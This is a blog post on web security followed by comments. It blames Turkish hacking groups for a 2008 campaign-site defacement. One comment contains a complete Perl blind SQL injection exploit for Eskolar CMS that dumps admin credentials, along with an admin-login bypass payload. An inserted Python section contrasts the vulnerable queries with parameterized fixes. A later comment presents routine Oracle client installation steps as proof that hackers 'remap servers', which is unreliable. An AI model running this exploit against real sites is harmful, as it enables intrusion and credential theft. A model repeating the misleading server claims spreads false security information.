A Little Help With Web Security


Many people are concerned with server and data security.  They should be.  But it is a lot easier to take measures when they know what to protect themselves from.

That information is available to all on the web.  One just needs to know where to look.

I remember my first encounter with hackers.  I was working the 2008 primaries for Presidential Candidate Duncan Hunter.  His site was attacked by TurkHackTeam.org.  I went to their site and found all their tips, techniques and tricks available:

The more you know about what you are up against, the better prepared you will be.  So, look up and find out everything you can about what you don't understand.  Information is what is needed to fight back.


Comments

  • 3/23/2011 6:36 AM Defendourfreedoms wrote:
    Primaries are over. Why is this relevant? Because the Turk-H, TurkHackTeam are connected to all the data dumps and hacks still occurring on the Net today. When looking into the now, never forget the past.


    http://www.slate.com/blogs/blogs/trailhead/archive/2008/01/17/exclusive-duncan-hunter-gets-hacked.aspx
    Exclusive! Duncan Hunter Gets Hacked
    Posted Thursday, January 17, 2008 6:00 PM | By Chadwick Matlin
    In a rare occurrence, I visited Duncan Hunter's Web site today to see if it still hadn't been updated in months. Surprisingly, it had. By a hacker.

    In the scrolling news marquee, a team of hackers who go by the handles clientcode, undertaker, and theghost left a message for all of Hunter's American fans: "Kiss You Babyyy yeahhh (:"

    Is that the best they could come up with? How about, "Duncan Hunter is a one-delegate farce," "Duncan Hunter supports an Iraq war that's killed hundreds of thousands of people," or "Duncan Hunter, you're a God-fearing slimeball. Drop out of the race." If you're going to hack the man's site, at least do it with a little panache.

    This isn't the first time Hunter's site has been hacked, according to campaign manager Roy Tyler. He told me that a few days ago, Turkish hackers got into the site and left a message in Arabic that blasted Hunter for his pro-Iraq record. It was also hacked about a year ago. Tyler said the campaign expected to be a hacker target, so they took extra security precautions, but to no avail. When I called, Tyler said the campaign was unaware of the latest hack, but I later found out his tech team was already on it, and it was fixed a few minutes later.

    Trailhead found people on the Internet bragging about the hack that occurred earlier this week. A hacker congregation site, Turk-h.org, seems to suggest that someone going by "ayyildiz" attacked the site because of "politik sebepler" or "political causes" (according to a Turkish-English translation done by a friend). But it looks like different hackers (clientcode, undertaker, and theghost) got into the site this time. If my very uneducated assumptions are correct, it looks like ayyildiz is a prolific hacker, defacing over a thousand sites according to his profile on turk-h.org. The names "clientcode" and "undertaker" also appear frequently on various hacker forums.

    But of all the sites on the Internet, ayyildiz picked Hunter's to defame. He now joins the illustrious ranks of topsexxxlinks.com and turtle-pictures.de. But look on the bright side, at least somebody cares about Hunter's political beliefs.

    With Chris Wilson.

    Filed under: Duncan Hunter

  • 3/23/2011 6:48 AM Defendourfreedoms wrote:
    These sites being hacked aren't just leaving cute pictures and messages on the Index pages. They are cracking the database and downloading them. The pictures and messages are just to let you know they were there, like a gang tag. If they don't leave the gang tag, then you will never know your database was downloaded.

    http://www turkhackteam .org/eskolar-cms-0-9-0-0- remote-blind-sql-injection-exploit -t3963.html?s=f2559d37ab0bda0567557e1ade83c6de&t=3963


    This is the insert SQL that was used. Please note, the worm that was inputted to the database contains access for future use. What I read from the email from ElectionMall's lack of responsibility for leaving the database vulnerable, that they only reloaded the HTML splash pages and did absolutely nothing to secure the database.


    #===#!/usr/bin/perluse IO::Socket;#====================================== ================================================== ==========#======================================= =======================================## Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com ##================================================ ==============================##================== ================================================== ==============================#Title: Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability #Application: Eskolar CMS#Version: 0.9.0.0#Url: [Only Registered Users Can See Links]================================================= =================================================# ================================================== ================================================#A ffected software description:#Not properly sanitized input can be used to inject crafted SQL queries and cause#the database server to generate an invalid SQL query. We can use Blind SQL Injection attack#to determine username and password for CMS and also classical SQL Injection#to bypass admin logon. Password for CMS is storing in database as clear text!#There is using addslashes() function to filtration GET variables, but we can prepare#SQL query without slashes in Blind attack . There is not addslashes() function to filtration#variables using to log in, so we can use classical SQL Injection to log in as admin .#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php#====================================== ================================================== ==========#======================================= ================================================== =========#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)#if (isset ($_GET['gr_1_id'])) {# $gr_1_id = (get_magic_quotes_gpc()) ? 
$_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);#}#if (isset ($_GET['gr_2_id'])) {# $gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);#}#if (isset ($_GET['gr_3_id'])) {# $gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);#}#if (isset ($_GET['doc_id'])) {# $doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);#}#...#index.php - line 202#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";#etc.#...#======================================= ================================================== =========#======================================== ================================================== ========# Bypass admin logon :#Vulnerable code: (php/esa.php - lines 27-35)#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];#//$prefix="esa";#$enter = 0;#$_SESSION['uid'] = $uid;#$_SESSION['pwd'] = $pwd;# mysql_select_db($database _bkb, $bkb);#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";## If magic_quotes_gpc = Off attacker can log in as admin using classical SQL Injection attack.## Eg: USER: j4ck' or 1=1/*## PSW: *blank*#========================================== ================================================== =======#PoC Exploit:if ((@ARGV lt 2) or (@ARGV gt 3)) { &usage; }sub usage(){ print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n"; print "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n"; print "- Usage: $0 <target> <target directory>\r\n"; print "- <target> -> Victim's target eg: [Only Registered Users Can See Links]"; print "- <target directory> -> Path to index.php eg: /eskolar/\r\n"; print "- Eg: [Only Registered Users Can See Links] /esa/\r\n\r\n"; exit();}$HOST = $ARGV[0];$DIR = $ARGV[1];$prefixDB = $ARGV[2];if (@ARGV eq 2) { $prefixDB = "esa"; } print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";$HOST =~ 
s/([Only Registered Users Can See Links])//;#$positive = "?doc_id=999%20or%201=1--";#$negative = "?doc_id=999%20or%201=0--"; @ARR = ("user","password"); print "Connecting ...\r\n";sleep(1);TOP:for ($k=0;$k<=$#ARR;$k++) { $j=1; $i = 32; $string=''; $res=''; while() { $l=0; for ($i=32;$i<=127;$i++) { $val = "?doc_id=99999"; $val .= "/**/or/**/1=1"; $val .= "/**/and/**/ascii(substring("; $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)"; $val .= ",$j,1))/**/=/**/$i"; $data="$DIR$val"; $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!\r\n\r\n"; print $req "GET $data [Only Registered Users Can See Links]"; print $req "Host: $HOST\r\n"; print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n"; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n"; print $req "Accept-Encoding: gzip,deflate\r\n"; print $req "Keep-Alive: 300\r\n"; print $req "Connection: Keep-Alive\r\n"; print $req "Cache-Control: no-cache\r\n"; print $req "Connection: close\r\n\r\n"; while ($ans = <$req> { if ($ans =~ /404/ ) { print f "\n\nFile not found.\r\n\r\n"; exit; } if ($ans =~ /400/ ) { print f "\n\nBad request.\r\n\r\n"; exit; } if ($ans =~ /ORDER BY sorted ASC/) { $string .= chr($i); if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2)) { $res .= chr($i-1); $l=1; } last; } } if ($l eq 1) { print "Found: ".chr($i-1)."\r\n"; sleep(1); last; } if ($i eq 127) { print "$ARR[$k] found: $res\r\n"; $ARR[$k] = $res; if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne ''))) { print "\r\n\r\n\r\n-------------------- Username => $ARR[0]"; print " Password => $ARR[1] -----------------------\r\n"; } elsif (($ARR[0] eq '') and 
($ARR[1] eq '')) { print "Nothing found ..."; } if ($k eq 0) { sleep(1); print "\nTrying Password\r\n"; sleep(1); } sleep(1); next TOP; } print "\t\t\t\tTrying: ".chr($i)."\r\n"; } $string = ''; $j++; } }#================================================ ================================================== ======# milw0rm.com

    So who was printing Duncan Hunter's databases and what happened to all of the people's information that assisted with that primary campaign?  Yes, the primaries are over, but the hacking, stalking and harassing is not.  This is also a working model for all the cracks, hacks and stalking that have happened to websites since.  I just happen to have all of this data to work with.


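The two defects the exploit header above describes, an id that is passed through addslashes() but never quoted, and a login query that is quoted but never escaped, shown as an added Python/sqlite3 example beside their parameterized fixes. This is not the CMS's code nor the commenter's; the esa_ table names follow the prefix in the exploit header, and the rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the esa_* tables named in the exploit header
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE esa_admin_group_3 (id INTEGER, name TEXT);
        INSERT INTO esa_admin_group_3 VALUES (1, 'editors'), (2, 'staff');
        CREATE TABLE esa_admin_user (user TEXT, password TEXT);
        INSERT INTO esa_admin_user VALUES ('admin', 'secret');
    """)
    return db

def addslashes(s):
    # PHP-style addslashes(): escapes quotes and backslashes, nothing else
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def group_lookup_concat(db, gr_3_id):
    # Same shape as the index.php line 202 query: the id is escaped but never
    # quoted, so a payload with no quote characters passes addslashes() untouched
    q = "SELECT * FROM esa_admin_group_3 WHERE id = " + addslashes(gr_3_id)
    return db.execute(q).fetchall()

def parse_id(value):
    # Allow-list validation: only an unsigned decimal integer is accepted
    return int(value) if value.isdigit() else None

def group_lookup_param(db, gr_3_id):
    # Hardened form: validate, then bind as a parameter instead of concatenating
    gid = parse_id(gr_3_id)
    if gid is None:
        return []
    return db.execute("SELECT * FROM esa_admin_group_3 WHERE id = ?", (gid,)).fetchall()

def login_concat(db, uid, pwd):
    # Same shape as the esa.php query: POST values quoted but not escaped at all
    q = "SELECT * FROM esa_admin_user WHERE user = '%s' AND password = '%s'" % (uid, pwd)
    return db.execute(q).fetchone() is not None

def login_param(db, uid, pwd):
    # Hardened form: bound parameters, so a quote inside the value is only data
    q = "SELECT * FROM esa_admin_user WHERE user = ? AND password = ?"
    return db.execute(q, (uid, pwd)).fetchone() is not None
```

The cleartext password column the exploit header also notes is a separate defect that this example leaves untouched.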
  • 3/23/2011 7:15 AM Defendourfreedoms wrote:
    The Turk-H, TurkHackTeams, Anonymous, Chaoscomputer Group affiliates, #HQ et al, remap the Oracle servers at the root. This allows them to download databases from the servers. Who is downloading your data and where is it going? You only know if one of their script kiddies tags your Index file. Otherwise, you don't know they reconfigured your server for their own access.

    kdesu kwrite /etc/sysctl.conf

    Add the following lines to the very end of the /etc/sysctl.conf file:

    # Oracle 10g parameters
    kernel.shmall = 2097152
    kernel.shmmax = 2147483648
    kernel.shmmni = 4096
    kernel.sem = 250 32000 100 128
    fs.file-max = 65536
    net.ipv4.ip_local_port_range = 1024 65000
    net.core.rmem_default=4194304
    net.core.wmem_default=262144
    net.core.rmem_max=4194304
    net.core.wmem_max=262144

    To apply the changes we made in the file above, run this command in the console:

    # /sbin/sysctl -p

    Oracle variables

    Press Alt + F2 again and run the following command:

    kdesu kwrite /home/oracle/.bash_profile

    Add the following lines to this file.

    ORACLE_BASE=/home/oracle/oracle
    ORACLE_HOME=$ORACLE_BASE/product/10.2.0/client_1
    ORACLE_SID=orcl
    LD_LIBRARY_PATH=$ORACLE_HOME/lib
    PATH=$PATH:$ORACLE_HOME/bin
    export ORACLE_BASE ORACLE_HOME ORACLE_SID LD_LIBRARY_PATH PATH

    Save this file and run the following commands in the console.

    cd /home/oracle
    . .bash_profile

    Downloading the Oracle Client

    Download the file 10201_client_linux32.zip from Oracle's site (if you don't already have it; this one is for 10g, 11g is also out now). After downloading the file, create a directory named "orakur" under /home/oracle, copy the file there and extract it there. Now, inside the "orakur" folder, inside the "install" folder, there is a file named "oraparam.ini"; open this file with "kwrite" and

    SILENT_VARIABLE_VALIDATION=TRUE

    [Certified Versions]
    Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2

    [UnitedLinux-1.0-optional]
    TEMP_SPACE=80
    SWAP_SPACE=150
    MIN_DISPLAY_COLORS=256

    find this line, then

    [Certified Versions]
    Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2

    delete that line entirely and save.


    Required packages

    Run the following commands in the console, in order:

    # sudo pisi it libaio
    # sudo pisi it unixodbc

    We are now ready for the installation.


    Installation

    Open a fresh console and, with

    "su oracle"

    switch to the "oracle" user and enter the following commands in order

    # cd /home/oracle/orakur/client
    # LC_ALL=C
    # ./runInstaller

    Here the LC_ALL=C command relates to the language settings; without it the installation fails at the final stage. Follow all the instructions in the installer. If you change the installation's default path, you need to change the parameter in the third step. The "Network Configuration Assistant" will appear. Set it to "Perform Typical" and finish this part too. At the end it will tell you to run some files; without closing that screen, open a console window, log in as root and run these commands in order:

    # cd /home/oracle/oraInventory
    # ./orainstRoot.sh
    #
    #
    # cd /home/oracle/oracle/product/10.2.0/client_1
    # ./root.sh (answer the prompts directly with "ENTER")

    The installation is now complete.


    Running
    Running the Console

    Before running it from the console, the

    LC_ALL=C

    command must always be issued.

    The following lines;

    LC_ALL=C
    /home/oracle/oracle/product/10.2.0/client_1/bin/oemapp console
    --------------------------------------------------------------------------------------------

